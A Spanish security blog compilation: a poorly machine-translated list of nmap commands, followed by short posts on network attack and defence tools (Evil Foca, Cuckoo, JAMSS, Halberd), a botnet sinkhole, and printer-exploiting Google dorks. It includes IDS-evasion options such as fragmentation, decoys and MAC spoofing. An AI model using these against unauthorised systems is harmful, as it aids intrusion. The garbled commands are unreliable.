Top 30 de Nmap ejemplos de comandos para SYS / Red Admins

# 1: Escanear un único host o una dirección IP (IPv4)

  # # # Escanear una única dirección IP # # #
 nmap 192.168 0,1 0,1

 # # Escanear un nombre de host # # #
 nmap server1.cyberciti.biz

 # # Escanear un nombre de host con más info # # #
 nmap-v server1.cyberciti.biz

Salidas de muestra:

Fig.01: salida de nmap

# 2: Escanear varias direcciones IP o subred (IPv4)

  nmap 192.168.1.1 192.168.1.2 192.168.1.3
 # # Trabaja con la misma subred 192.168.1.0/24 es decir,
 nmap 192.168.1.1,2,3

Puede escanear un rango de direcciones IP también:

  nmap 192.168.1.1-20

Puede escanear un rango de direcciones IP utilizando un comodín:

  nmap 192.168.1. *

Por último, permite escanear una subred completa:

  192.168.1.0/24 nmap

# 3: Lea la lista de hosts / redes desde un archivo (IPv4)

La IL-opción le permite leer la lista de sistemas de destino mediante un archivo de texto. Esto es útil para analizar un gran número de hosts / redes. Cree un archivo de texto como sigue:
cat > /tmp/test.txt
Salidas de muestra:

  server1.cyberciti.biz
 192.168.1.0/24
 192.168.1.1/24
 10.1.2.3
 localhost

La sintaxis es la siguiente:

  nmap-iL / tmp / prueba.txt

# 4: Exclusión de hosts / redes (IPv4)

Al escanear un gran número de hosts / redes se pueden excluir los hosts de una exploración:

  nmap 192.168.1.0/24 - exclude 192.168.1.5
 nmap 192.168.1.0/24 - exclude 192.168.1.5,192.168.1.254

O Excluir lista desde un archivo llamado / tmp / exclude.txt

  nmap-iL / tmp / scanlist.txt - excludefile / tmp / exclude.txt

# 5: Encienda el script de sistema operativo y versión de escaneo de detección (IPv4)

  nmap-A 192.168.1.254
 nmap-v-A 192.168.1.1
 nmap-A-iL / tmp / scanlist.txt

# 6: Para saber si un host / red están protegidos por un firewall

  nmap-sA 192.168.1.254
 nmap-sA server1.cyberciti.biz

# 7: Escanear un host si está protegido por el firewall

  nmap-PN 192.168.1.1
 nmap-PN server1.cyberciti.biz

# 8: Escanear un host de IPv6 / dirección

La opción -6 habilitar el análisis de IPv6. La sintaxis es la siguiente:

  nmap -6 IPv6-Address-aquí
 nmap -6 server1.cyberciti.biz
 nmap -6 2607: f0d0: 1002:51 :: 4
 nmap-v A -6 2607: f0d0: 1002:51 :: 4

# 9: Escanear una red y averiguar qué servidores y dispositivos están en marcha

Esto se conoce como anfitrión descubrimiento o exploración de ping:

  nmap-sP 192.168.1.0/24

Salidas de muestra:

  Host 192.168.1.1 es hacia arriba (0.00035s latencia).
 Dirección MAC: BC: AE: C5: C3: 16:93 (Desconocido)
 Host 192.168.1.2 es hacia arriba (0. 0038s latencia ).
 Dirección MAC: 74:44:01:40:57: FB (Desconocido)
 Host 192.168.1.5 está arriba.
 Host nas03 (192.168.1.12) es más (0.0091s latencia).
 Dirección MAC: 00:11:32:11:15: FC (Synology Incorporated)
 Nmap hecho: 256 direcciones IP de hosts (4 más) escaneada en 2,80 segundos

# 10: ¿Cómo puedo realizar un análisis rápido?

  nmap-F 192.168.1.1

# 11: Muestra la razón, un puerto está en un estado particular

  nmap - razón 192.168.1.1
 nmap - server1.cyberciti.biz razón

Mostrar únicamente los puertos abiertos (o posiblemente abierto): # 12

  nmap - open 192.168.1.1
 nmap - abierto server1.cyberciti.biz

# 13: Muestra todos los paquetes enviados y recibidos

  nmap - packet-trace 192.168.1.1
 nmap - packet-trace server1.cyberciti.biz

14 #: show interfaces de host y rutas

Esto es útil para la depuración ( comando ip o comando route o comando netstat como salida usando nmap)

  nmap - iflist

Salidas de muestra:

  Starting Nmap 5.00 (http://nmap.org) en 2012 -11 -27 02: 01 EST
 INTERFACES ************************ ************************
 DEV (SHORT) IP / máscara de tipo UP MAC
 lo (lo) 127,0 0,0 0,1 / 8 hasta loopback
 eth0 (eth0) 192.168 0,1 0,5 / 24 ethernet hasta B8: AC: 6F: 65: 31: E5
 vmnet1 (vmnet1) 192.168 0.121 0,1 / 24 ethernet hasta 00: 50: 56: C0: 00: 01
 vmnet8 (vmnet8) 192.168 0.179 0,1 / 24 Ethernet hasta 00: 50: 56: C0: 00: 08
 ppp0 (ppp0) 10,1 0,19 0,69 / 32 hasta point2point

 ************************** RUTAS *********************** ***
 DST / MASK DEV PASARELA
 10,0 .31 .178 / 32 ppp0
 209,133 .67 .35 / 32 eth0 192.168 0,1 0,2
 192.168 0,1 0,0 / 0 eth0
 192.168 0.121 0,0 / 0 vmnet1
 192.168 0.179 0,0 / 0 vmnet8
 169.254 0,0 0,0 / 0 eth0
 10,0 0,0 0,0 / 0 ppp0
 0,0 0,0 0,0 / 0 eth0 192.168 0,1 0,2

# 15: ¿Cómo puedo escanear puertos específicos?

  mapa-p [puerto] hostName
 # # Escanear el puerto 80
 nmap-p 80 192.168 0,1 0,1

 # # Escanear el puerto TCP 80
 nmap-p T: 80 192.168 0,1 0,1

 # # Scan UDP puerto 53
 nmap-p U: 53 192.168 0,1 0,1

 # # Escanear dos puertos # #
 nmap-p 80, 443 192.168 0,1 0,1

 # # Escanea rangos de puertos # #
 nmap-p 80 -200 192.168 0,1 0,1

 # # Combinar todas las opciones # #
 nmap-p U: 53, 111, 137, T: 21 -25, 80, 139, 8080 192.168 0,1 0,1
 nmap-p U: 53, 111, 137, T: 21 -25, 80, 139, 8080 server1.cyberciti.biz
 nmap-v-sU-sT-p U: 53, 111, 137, T: 21 -25, 80, 139, 8080 192.168 0,1 0.254

 # # Analizar todos los puertos con comodín * # #
 nmap-p "*" 192.168 0,1 0,1

 # # Escanear puertos principales, es decir $ escanear puertos numéricos más comunes # #
 nmap - TOP-puertos 5 192.168 0,1 0,1
 nmap - top-ports 10 192.168 0,1 0,1

Salidas de muestra:

  Starting Nmap 5.00 (http://nmap.org) en 2012 -11 -27 01: 23 EST
 Puertos de interés sobre 192.168 0,1 0,1:
 PORT STATE SERVICE
 21 / tcp cerrado ftp
 22 / tcp abierto ssh
 23 / tcp telnet cerrado
 25 / tcp smtp cerrada
 80 / tcp abiertos http
 110 / tcp cerrado pop3
 139 / tcp cerrado netbios-ssn
 443 / tcp cerrado https
 445 / tcp cerrado microsoft-ds
 3389 / tcp cerrado ms plazo-serv
 Dirección MAC: BC: AE: C5: C3: 16: 93 (Desconocido)

 Nmap hecho: 1 dirección IP (1 huésped up) escaneada en 0,51 segundos

# 16: La forma más rápida para escanear todos los dispositivos / equipos para puertos abiertos a la vez

  nmap-T5 192.168.1.0/24

# 17: ¿Cómo puedo detectar el sistema operativo remoto?

Puede identificar algunas aplicaciones y el sistema operativo host remoto utilizando la opción-O :

 nmap-O 192.168 0,1 0,1
 nmap-O - osscan-Supongo 192.168 0,1 0,1
 nmap-v-O - osscan-Supongo 192.168 0,1 0,1

Salidas de muestra:

 Starting Nmap 5.00 (http://nmap.org) en 11/27/2012 01:29 IST
 NSE: Cargado 0 secuencias de comandos para la exploración.
 Inicio de ARP Ping Scan a las 01:29
 Escaneo 192.168.1.1 [1 puerto]
 Completado ARP Ping Scan a las 01:29, 0.01s transcurrido (1 hosts totales)
 Iniciar paralelo resolución DNS de un host.  a las 01:29
 Completado resolución DNS en paralelo de un host.  a las 01:29, 0.22s transcurrido
 Iniciar SYN Scan sigilo a las 01:29
 Escaneo de puertos 192.168.1.1 [1000]
 Descubierto 80/tcp puerto abierto en 192.168.1.1
 Descubierto 22/tcp puerto abierto en 192.168.1.1
 Completado SYN Scan sigilo a las 01:29, 0.16s transcurrido (1000 puertos en total)
 Inicio de detección de sistema operativo (prueba n º 1) en contra de 192.168.1.1
 Intentando de nuevo OS detección (prueba # 2) contra 192.168.1.1
 Intentando de nuevo OS detección (prueba n º 3) en contra de 192.168.1.1
 Intentando de nuevo OS detección (prueba n º 4) contra 192.168.1.1
 Intentando de nuevo OS detección (prueba n º 5) contra 192.168.1.1
 Host 192.168.1.1 es hacia arriba (0.00049s latencia).
 Puertos de interés sobre 192.168.1.1:
 No se muestra: 998 puertos cerrados
 PORT STATE SERVICE
 Ssh 22/tcp abierto
 80/tcp abierto http
 Dirección MAC: BC: AE: C5: C3: 16:93 (Desconocido)
 Tipo de dispositivo: WAP | Aplicaciones generales | Router | Imprimir | router de banda ancha
 Funcionamiento (sólo una suposición): Linksys Linux 2.4.X (95%), Linux 2.4.X | 2.6.X (94%), Mikrotik RouterOS 3.x (92%), Lexmark Embedded (90%), Enterasys embedded (89 %), D-Link Linux 2.4.X (89%), Linux 2.4.X Netgear (89%) 
  Agresivo conjeturas SO: OpenWrt White Russian 0,9 (Linux 4.2.30) (95%), OpenWrt 0,9 a 7,09 (Linux 2.4.30 a 2.4.34) (94%), OpenWrt Kamikaze 7,09 (Linux 6.2.22) (94% ), Linux 2.4.21-2.4.31 (probablemente incrustado) (92%), Linux 2.6.15-2.6.23 (embedded) (92%), Linux 2.6.15-2.6.24 (92%), Mikrotik RouterOS 3.0beta5 (92%), Mikrotik RouterOS 3.17 (92%), Linux 2.6.24 (91%), Linux 2.6.22 (90%) 
  No hay coincidencias exactas para el host del sistema operativo (si usted sabe qué sistema operativo se está ejecutando en ella, ver http://nmap.org/submit/).
 TCP / IP de huella digital:
 OS: SCAN (V = 5,00 D = 11% / 27% = 22% OT CT = 1% CU = 30609% PV = Y% DS = 1% G = Y% m% = BCAEC5 TM = 50B3CA
 OS:% P = 4B x86_64-unknown-linux-gnu) SEC (SP = C8% GCD = 1% ISR = CB% TI = Z% CI = Z% II = I% TS = 7
 OS   OPS (O1 = M2300ST11NW2% O2 = O3 M2300ST11NW2% = M2300NNT11NW2% O4 O5 = M2300ST11NW2%
 OS: = M2300ST11NW2% O6 = M2300ST11) WIN (W1 = 45E8% W2 = 45E8% W3 = 45E8% W4 W5 = 45E8% = 45E8% W
 OS: 6 = 45E8) REC (R = Y% DF = Y% T = 40% W = 4600% O = CC = M2300NNSNW2% N% = Q) T1 (R = Y% DF = Y% T = 40% S
 OS: =% S A = S + F% = EN% RD = 0% Q =) T2 (R = N) T3 (R = N) T4 (R = Y% DF = Y% T = 40% W = 0% S = A% A% = Z F = R% S% = R
 OS: D = 0% Q =) T5 (R = Y% DF = Y% T = 40% W = 0% S = Z% A = S + F% = AR% O =% RD = 0% Q =) T6 (R = Y% DF = Y% T = 40% W =
 OS: 0% S = A% A% = Z = F R% S% = RD = 0% = Q) T7 (R = N) U1 (R = Y% DF = N% T = 40% IPL = 164% UN = 0% =% RIPL G RID
 OS: = G = G RIPCK%%% RUCK = G = G RUD) IE (R = Y% DFI = N% T = CD = 40% S)
 Uptime conjetura: 12,990 días (desde mié 14 de noviembre 01:44:40 2012)
 Distancia de red: 1 salto
 Predicción de Secuencia TCP: Dificultad = 200 (Buena suerte!)
 IP ID Generación de secuencia: Todo ceros
 Leer archivos de datos de: / usr / share / nmap
 OS detección realizada.  Por favor reporte cualquier resultado incorrecto en http://nmap.org/submit/.
 Nmap hecho: 1 dirección IP (1 huésped up) escaneada en 12,38 segundos
            Paquetes enviados: Raw 1126 (53.832KB) | Rcvd: 1066 (46.100KB)

Véase también: Toma de huellas dactilares de un servidor web y un servidor DNS herramientas de línea de comandos para más información.

# 18: ¿Cómo puedo detectar servicios remotos (servidor / daemon) números de versión?

  nmap-sV 192.168.1.1

Salidas de muestra:

  Starting Nmap 5.00 (http://nmap.org) en 11/27/2012 01:34 IST
 Puertos de interés sobre 192.168.1.1:
 No se muestra: 998 puertos cerrados
 ESTADO DEL PUERTO DE SERVICIO VERSION
 22/tcp abierto ssh sshd Dropbear 0,52 (protocolo 2.0)
 80/tcp abierto http?
 Un servicio reconocido a pesar de los datos que regresan.

# 19: Escanear un host que utiliza TCP ACK (PA) y TCP Syn (PS) de ping

Si el firewall está bloqueando estándar pings ICMP, pruebe los métodos siguientes descubrimiento de acogida:

  nmap-PS 192.168.1.1
 nmap-PS 80,21,443 192.168.1.1
 nmap-PA 192.168.1.1
 nmap-PA 80,21,200-512 192.168.1.1

# 20: Escanear un host con mesa de ping IP

  nmap-PO 192.168.1.1

# 21: Escanear un host que utiliza UDP mesa de ping

Este análisis no pasa por firewalls y filtros de pantalla que sólo TCP:

  nmap-PU 192.168.1.1
 nmap-PU 2000.2001 192.168.1.1

# 22: Descubre los más utilizados los puertos TCP que utilizan TCP SYN Scan

 # # # Sigiloso escanear # # #
 nmap-sS 192.168 0,1 0,1

 # # # Conocé las más comunes que utilizan los puertos TCP TCP connect scan (aviso: no hay exploración sigilo)
 # # # OS Fingerprinting # # #
 nmap-sT 192.168 0,1 0,1

 # # # Conocé las más comunes que utilizan los puertos TCP scan TCP ACK
 nmap-sA 192.168 0,1 0,1

 # # # Conocé las más comunes que utilizan los puertos TCP TCP Window scan
 nmap-sW 192.168 0,1 0,1

 # # # Conocé las más comunes que utilizan los puertos TCP TCP Maimon scan
 nmap-sM 192.168 0,1 0,1

# 23: Escanear un host para servicios UDP (UDP scan)

Mayoría de los servicios populares de Internet se extienden sobre el protocolo TCP. DNS, SNMP y DHCP son tres de los servicios UDP más comunes. Utilice la sintaxis siguiente para averiguar los servicios UDP:

  nmap-sU nas03
 nmap-sU 192.168.1.1

Salidas de muestra:

 Starting Nmap 5.00 (http://nmap.org) en 2012 -11 -27 00: 52 EST
 Estadísticas: 0: 05: 29 transcurrido; 0 anfitriones completado (1 arriba), 1 experimentando UDP Scan
 UDP Scan Tiempo: Acerca de 32,49% hecho, ETC: 01:09 (0:11:26 restante)
 Puertos de interés sobre nas03 (192,168 .1 .12):
 No se muestra: 995 puertos cerrados
 PORT STATE SERVICE
 111 / udp abierto | filtrado rpcbind
 123 / udp abierto | filtrado ntp
 161 / udp abierto | filtrado snmp
 2049 / udp abierto | filtrado nfs
 5353 / udp abierto | filtrado zeroconf
 Dirección MAC: 00: 11: 32: 11: 15: FC (Synology Incorporated)

 Nmap hecho: 1 dirección IP (1 huésped up) escaneada en 1099,55 segundos

# 24: Analizar en busca de protocolo IP

Este tipo de análisis permite determinar qué protocolos IP (TCP, ICMP, IGMP, etc) son compatibles con los equipos de destino:

  nmap-sO 192.168.1.1

# 25: Digitalizar un firewall para la debilidad en la seguridad

Los siguientes tipos de exploración explotar una escapatoria sutil en el TCP y bueno para probar la seguridad de los ataques más comunes:

 # # TCP Null Scan para engañar a un servidor de seguridad para generar una respuesta # #
 # # No establece ningún bit (encabezado TCP bandera es 0) # #
 nmap-sN 192.168 0,1 0.254

 # # TCP Fin scan para comprobar firewall # #
 # # Establece sólo el bit FIN TCP # #
 nmap-sF 192.168 0,1 0.254

 # # TCP Xmas escaneado para comprobar firewall # #
 # # Establece el FIN, PSH, URG y banderas, encendiendo el paquete como un árbol de Navidad # #
 nmap-sX 192.168 0,1 0.254

Vea cómo bloquear Navidad packkets, syn inundaciones y otros ataques conman con iptables.

# 26: Digitalizar un servidor de seguridad de los fragmentos de paquetes

La opción-f hace que la exploración solicitada (incluyendo las exploraciones ping) a utilizar pequeños paquetes IP fragmentados. La idea es dividir la cabecera TCP a través de
varios paquetes para que sea más difícil para los filtros de paquetes, sistemas de detección de intrusos y otras molestias para detectar lo que está haciendo.

 nmap-f 192.168.1.1
 nmap-f fw2.nixcraft.net.in
 nmap-f 15 fw2.nixcraft.net.in
 # # Establece el tamaño de su propia compensación con la opción - mtu # #
 nmap - mtu 32 192.168.1.1

# 27: Capa de un análisis con señuelos

La opción-D que aparecen al host remoto que el host (s) se especifica como señuelos a escanear la red de destino también . Así, sus IDS puede informar escaneos de puertos 5-10 de direcciones IP únicas, pero no sabrán qué IP se escanearlos y que eran señuelos inocentes:

  nmap-n-Ddecoy-IP1, IP2-señuelo, su-propio-ip, señuelo-IP3, IP4-señuelo a distancia-host-ip
 nmap-n-D192.168.1.5, 10.5.1.2,172.1.2.4,3.4.2.1 192.168.1.5

# 28: Digitalizar un firewall para la falsificación de direcciones MAC

 # # # Spoof su dirección MAC # #
 nmap - spoof-mac MAC-ADDRESS-HERE 192.168 0,1 0,1

 # # # Añadir otra opción # # #
 nmap-v-sT-PN - spoof-mac MAC-ADDRESS-HERE 192.168 0,1 0,1

 # # # Usar una dirección MAC aleatoria # # #
 # # # El número 0, significa nmap elige una dirección MAC completamente al azar # # #
 nmap-v-sT-PN - spoof-mac 0 192.168 0,1 0,1

# 29: ¿Cómo puedo guardar la salida en un archivo de texto?

La sintaxis es la siguiente:

  nmap 192.168.1.1> output.txt
 nmap-oN / ruta / al / archivo 192.168.1.1
 nmap-oN output.txt 192.168.1.1

# 30: No es un ventilador de herramientas de línea de comandos?

Trate Zenmap el asignador de red oficial de interfaz:

Zenmap es el oficial de Nmap Security Scanner GUI. Se trata de una plataforma multi-(Linux, Windows, Mac OS X, BSD, etc) la aplicación gratuita y de código abierto que tiene como objetivo hacer Nmap fácil de usar para principiantes al tiempo que proporciona funciones avanzadas para usuarios experimentados de Nmap. Exploraciones de uso más frecuente se pueden guardar como perfiles para que sean fáciles de ejecutar repetidamente. Un creador de comando permite la creación interactiva de línea de comandos de Nmap. Los resultados del análisis se pueden guardar y ver más tarde. Resultados de análisis guardados se pueden comparar entre sí para ver qué se diferencian. Los resultados de los análisis recientes se guardan en una base de datos.

Puede instalar Zenmap usando el siguiente comando apt-get :
$ sudo apt-get install zenmap
Salidas de muestra:

  Password [sudo] para vivek:
 Leyendo lista de paquetes ...  Hecho
 Edificio árbol de dependencias
 Leyendo la información de estado ...  Hecho
 Los siguientes paquetes NUEVOS serán instalados:
   Zenmap
 0 actualizados, 1 se instalarán, 0 para eliminar y 11 no actualizados.
 Necesidad de obtener 616 kB de archivos.
 Después de esta operación, 1.827 kB de espacio de disco adicional se utilizará.
 Obtener: 1 chorrito http://debian.osuosl.org/debian/ / main Zenmap amd64 5.00-3 [616 kB]
 Recuperados de 616 kB en 3s (199 kB / s)
 Seleccionando previamente no seleccionado Zenmap paquete.
 (Leyendo la base de datos ... 281105 ficheros y directorios instalados actualmente.)
 Desembalaje Zenmap (de ... / zenmap_5.00 3_amd64.deb-) ...
 Procesamiento de disparadores para desktop-file-utils ...
 Procesamiento de disparadores para gnome-menus ...
 Procesamiento de disparadores para man-db ...
 Configuración de Zenmap (5.00-3) ...
 Procesamiento de disparadores para python-central ...

Escriba el siguiente comando para iniciar Zenmap:
$ sudo zenmap
Salidas de muestra

Fig.02: Zenmap en acción

Evil Foca... La Foca Maldita jaja

Evil Foca (Alpha Version) es una herramienta para pentester y auditores de seguridad que tiene como fin poner a prueba la seguridad en redes de datos IPv4 / IPv6.

La herramienta es capaz de realizar distintos ataques como:

    MITM sobre redes IPv4 con ARP Spoofing y DHCP ACK Injection.
    MITM sobre redes IPv6 con Neighbor Advertisement Spoofing, Ataque SLAAC, fake DHCPv6.
    DoS (Denegación de Servicio) sobre redes IPv4 con ARP Spoofing.
    DoS (Denegación de Servicio) sobre redes IPv6 con SLAAC DoS.
    DNS Hijacking.

Automáticamente se encarga de escanear la red e identificar todos los dispositivos y sus respectivas interfaces de red, especificando sus direcciones IPv4 e IPv6 y las direcciones físicas. 

Evil Foca está dividida en 4 paneles, a la izquierda el panel encargado de mostrar los equipos encontrados en la red, donde se podrá agregarlos a mano, y filtrar los resultados obtenidos.

El segundo panel, dispuesto en el centro con todos los posibles ataques a realizar con la herramienta, y a su derecha una breve descripción de cada uno de ellos.

Colocado bajo el panel anterior, se muestran los ataques que se están realizando, su configuración y su estado, permitiendo activarlo o desactivarlo.

Por último, el panel inferior donde se imprime un log de los eventos de la Evil Foca. 

Fuente y Descarga

Smooth-Sec - IDS / IPS (sistema de detección / prevención de intrusiones) en una caja

No hemos escrito acerca de Smooth-Sec por un tiempo desde que nos enteramos de que en v1 marzo de 2011.

Para aquellos que no están familiarizados, Smooth-Sec es un completamente listos IDS e IPS (Intrusion Detection System y Prevención) de distribución de Linux basada en Debian 7 (sibilancias), para 32 y 64 bits de arquitectura. La distribución incluye la última versión de Snorby, Snort, Suricata, pulledpork y Pocilga. Un proceso de instalación fácil le permite desplegar una completa IDS / IPS del sistema en cuestión de minutos, incluso para los principiantes de seguridad con experiencia en Linux mínimo.

Debian 7 Wheezy base
32 y 64 bits iso disponible. Snorby V 2.6.2
Snort V 2.9.4.6
Suricata V 1.4.3
Pocilga V 0.1.0
Pulledpork V 0.6.1
Puede descargar Smooth Sec aquí -

32-Bit - smoothsec-3.0-i386.iso
64-Bit - smoothsec-3.0-amd64.iso

O leer más aquí.

montar fácilmente un laboratorio de análisis de malware.

montar fácilmente un laboratorio de análisis de malware.

Cuckoo Sandbox es un sistema de análisis de malware de código abierto. Esta aplicación permite analizar cualquier archivo sospechoso y en cuestión de segundos,  Cuckoo proporcionará resultados detallados que describen lo que resultaría cuando se ejecuta dentro de un entorno aislado.

El malware es la principal herramienta de los cibercriminales y de los principales ciberataques en organizaciones empresariales. En estos tiempos la detección y eliminación de malware no es suficiente: es de vital importancia entender: cómo funcionan, lo que harían en los sistemas cuando se despliega, comprender el contexto, las motivaciones y los objetivos del ataque. De esta manera entender los hechos y responder con mayor eficacia para protegerse en el futuro. Hay infinidad de contextos en los que se puede necesitar implementar un entorno limitado, desde el análisis de una violación interna, recolectar datos procesables y analizar posibles amenazas.

Cuckoo genera un puñado de diferentes datos brutos, que incluyen:

• Las funciones nativas y API de Windows llamadas huellas.
• Las copias de los archivos creados y eliminados del sistema de ficheros.
• Volcado de la memoria del proceso seleccionado.
• Volcado completo de memoria de la máquina de análisis.
• Capturas de pantalla del escritorio durante la ejecución del análisis de malware.
• Volcado de red generado por la máquina que se utiliza para el análisis.

A fin de que tales resultados sean mejor interpretados por los usuarios finales, Cuckoo es capaz de procesar y generar diferentes tipos de informes, que podrían incluir:

• Informe JSON.
• Informe HTML.
• Informe MAEC.
• Interfaz de MongoDB.
• Interfaz HPFeeds.

Lo más interesante, es que gracias a la amplia estructura modular del Cuckoo, es posible personalizar tanto el procesamiento y la fase de presentación de informes. Cuckoo proporciona todos los requisitos para integrar fácilmente un entorno aislado con los sistemas existentes, con los datos que se deseen, de la manera que desee y con el formato que desee.

Más información y descarga de Cuckoo Sandbox:
http://www.cuckoosandbox.org/

Documentación de Cuckoo Sandbox:
http://docs.cuckoosandbox.org/en/latest/

Script para rastrear malware en Joomla!.

Script para rastrear malware en Joomla!.

Se trata de JAMSS (Joomla! Anti-Malware Scan Script) un script programado para ayudar a todos los administradores de Joomla! a comprobar si su sistema  contiene malware, troyanos u otro código malicioso. El script utiliza patrones actuales de fingerprinting para identificar las amenazas malware más comunes, que puedan afectar a Joomla!. Este script no hace ninguna limpieza por su cuenta , solo informa sobre algún código sospechoso en Joomla!. JAMSS no es 100% preciso, tiene algunos falsos positivos por lo que debe ser utilizado con sabiduría y prudencia.


Como ejecutarlo:


Se sube el archivo “jamss.php” al webroot de la cuenta de hosting.
Se carga el archivo del escáner en el navegador usando una URL como esta:

http://www..com/jamss.php

La secuencia de comandos se ejecutará durante varios segundos, incluso minutos, dependiendo del número de archivos y carga de trabajo del servidor web.

Si  se desea realizar un análisis en profundidad, que puede detectar las versiones más recientes de malware se utiliza el parámetro DeepScan = 1. Esta función busca en los archivos las funciones de PHP que utiliza el malware.

Ejemplo de ejecución en el navegador:

http://www. .com/jamss.php?deepscan=1


Como interpretar los resultados:

El script inspecciona código contenido dentro de archivos y trata de identificar posibles códigos maliciosos usando muchas huellas digitales de malware conocido. Una vez que el script ha terminado de ejecutarse, generará y mostrará un informe para su revisión,  que puede poseer falsos positivos y que debe ser interpretados con el fin de determinar si algún resultado en particular es una potencial amenaza de malware.

Para cada potencial amenaza, el informe mostrará: la ruta de acceso al archivo en cuestión, el patrón que se adapta al código de malware y una breve descripción de lo que este código podría estar haciendo.

Si existe alguna duda acerca de un archivo identificado por JAMSS, el archivo debe ser descargado e inspeccionado para determinar si hay un problema con él.  Si existe sospecha de un archivo en Joomla! o archivos de extensiones: se descargaran todos los paquetes ZIP / TAR.XX y se comprobaran. A continuación, se remplazara el archivo sospechoso por el original correspondiente de Joomla !  y con la misma versión que se está ej

ecutando.  Si el archivo sospechoso no existe en los archivos originales de instalación de Joomla! o en los archivos de extensiones, se puede mover a una nueva carpeta segura (protegida por contraseña, o con permisos restrictivos) para que nadie tenga acceso y luego eliminarlo por completo, una vez que se determina que es un archivo que no necesita para el funcionamiento de Joomla!.
En caso de dudas sobre archivos o extensiones que pertenecen a Joomla!, o qué hacer en caso de una infección, es muy recomendable utilizar los foros de Joomla!:

http://forum.joomla.org/viewtopic.php?f=621&t=582854 

Y no realizar alguna acción que pueda comprometer la disponibilidad de nuestro sitio web. JAMSS es un script para usar con ciertos conocimientos de PHP y como un análisis rápido de malware.

Más información y descarga de JAMSS:
https://github.com/btoplak/Joomla-Anti-Malware-Scan-Script/tree/forum

Auditar la seguridad de la configuración del balanceo de carga de servidores Web.

Para poder hacer frente al tráfico Web muchas veces los administradores de servidores Web tienen que implementar balanceadores de carga. Los balanceadores de carga ocultan muchos servidores web verdaderos detrás de una IP virtual. Reciben peticiones HTTP y las dirigen a los servidores web para compartir el tráfico entre ellos.

Con la herramienta Halberd permite descubrir los servidores que se encuentras detrás del balanceador de carga y auditar la seguridad de la configuración.

El modo de funcionamiento de Halberd se divide en tres etapas:

• Inicialmente, envía peticiones múltiples al servidor Web a auditar y registra sus respuestas. Esto se denomina fase de muestreo.
• Después, el programa procesa las contestaciones y busca muestras del equilibrio de carga. Esto se llama la fase de análisis.
• Finalmente, la Halberd escribe un informe de sus resultados.

Halberd utiliza las siguientes técnicas:

Comparación de la fecha. Las respuestas HTTP revelan el reloj interno del servidor Web que las produce. Si aparecen varios resultados con tiempos de reloj diferente, Halberd identifica número de servidores verdaderos. Este método funciona si los servidores Web no están sincronizados con un NTP.

Diferencia de nombres de campo de las cabeceras del MIME. Las diferencias en los campos que aparecen en respuestas del servidor pueden permitir que la Halberd identifique los servidores.

Generación de altas cantidades de tráfico. Bajo ciertas configuraciones, los balanceadores de la carga comienzan a distribuir tráfico, solamente después de que se alcance cierto umbral. Esta herramienta intenta generar un volumen de tráfico importante para accionar esta condición y alcanzar tantos servidores verdaderos como sea posible.

Usando diversas URL. Un balanceador de carga se puede configurar para redirigir el tráfico a distintos servidores según la URL a la que se acceda. Esta herramienta utiliza una araña para navegar por las diferentes URL para diferenciar los distintos servidores que contestan.

Detección de cache del servidor. Detecta si los servidores web utilizan cache para acelerar las peticiones con programas tipo Squid.

Obtención de IP públicas. A veces las cookies o los campos especiales del MIME en respuestas del servidor pueden revelar direcciones IP públicas de los servidores web. En estos casos se puede puentear el balanceador de carga y acceder directamente al servidor web.

Más información y descarga de Halberd:
http://halberd.superadditive.com/

Manual de Halberd:
http://halberd.superadditive.com/doc/manual/

¿Qué es un Sinkhole?

Hablando sobre naturaleza, un sinkhole - término inglés - define un hundimiento de tierra u hoyo. En el mundo de informática, sin embargo, se denomina sinkhole a una técnica de defensa contra botnets que puede neutralizar la misma completamente, puesto que trata de controlar el punto al que se conectarán los ordenadores infectados, atrayéndolos como si fuese un agujero de verdad.

Para tratar con un ejemplo real, vamos a ver cómo está siendo “sinkholeado” el troyano Mebroot, también conocido como Sinowal/Torpig. Antes de nada, debemos mencionar que esta familia de malware no se conecta únicamente a un único panel de control, sino que utiliza un algoritmo para generar los nombres de dominio a los que se conectará. 

Peticiones realizadas desde una maquina infectada

La generación de dominios continúa hasta que uno de ellos resuelva y se compruebe su validez. Esta técnica no es novedosa, y se utiliza para que la botnet sea más difícil de destruir, a la vez que permite poder recuperar la botnet en cualquier momento registrando un dominio futuro que se sepa que va a ser generado el día X. No obstante, tiene su desventaja, y es que cualquiera que conozca o descifre el algoritmo de generación de dominios podría ir un paso por delante y registrar uno de los dominios a los que se conectarán los bots.

Como veremos a continuación, justo lo escrito arriba está pasando con la muestra que hemos analizado, y es que el servidor  que finalmente se pudo resolver dicho día envió el siguiente mensaje:

Respuesta descifrada desde del C&C

El bot en cuestión recibió el comando NOOP junto con la nota pwned, indicándole que se quedara en espera (NO OPeration) y paró de generar más dominios.

Con esto, podemos decir que el servidor malicioso ha sido reemplazado por uno controlado presuntamente por investigadores de seguridad, y los propietarios de ese servidor podrán obtener inteligencia acerca del tamaño de la botnet, las IPs de las víctimas, hasta avisar los proveedores de servicios de internet de una infección posible.

Jozsef Gegeny

S21sec ACSS

Explotación de vulnerabilidades en impresoras

El uso de Google Dorks para encontrar equipos en la red no es algo novedoso. De echo se usa para buscar versiones de software específico y poder usar los últimos exploits que han salido. Y que lo mas seguro, es que algunos administradores no hayan parcheado sus equipos.
Los cracks de Hackplayers el otro día publicaban algunos dorks para encontrar cámaras IP usando Google Dorks.
http://www.hackplayers.com/2013/01/google-dorks-para-espiar-webcams.html
En el POST podemos encontrar una manera de encontrar impresoras vulnerables. Además hay herramienta para realizar la epxlotación de la vulnerabilidad.
Es por eso que podemos hacer búsquedas del siguiente tipo:

Impresoras vulnerables

Además tenemos, como comentaba, la herramienta está disponible en GitHub
https://github.com/percx/Praeda
Be powerful with Google!

Análisis automático de malware con Cuckoo

Hay que entender que Cuckoo es como un Daemon es decir, lo hemos de dejar ejecutándose, y subir los binarios o URL para que Cuckoo las vaya analizando.
Para empezar, nos vamos al PATH, donde tenemos Cuckoo y ejecutamos:

python cuckoo.py

Por pantalla podremos ver algo así:

Ahora Cuckoo cuando lanzemos las tareas de análisis nos irá mostrando por pantalla que va haciendo. Además si por o que fuera tuviéramos algún error nos lo mostraría por pantalla.
Escogemos un binario cualquiera a analizar y se lo pasamos como parámetro al submit de cuckoo, así:

python submit.py troyano.exe

En Cuckoo veremos cosas como:

Cuckoo irá realizando las tareas una por una, hasta acabar.
Cuando acaba, nos genera un reports  en varios formatos que podremos consultar mas tarde.
Para verlo hará falta arrancar la parte web, ejecutamos:

python web.py

Si no queremos arrancarlo en localhost se le puede pasar como parámetro -t IP -p PUERTO
La web tiene este aspecto:

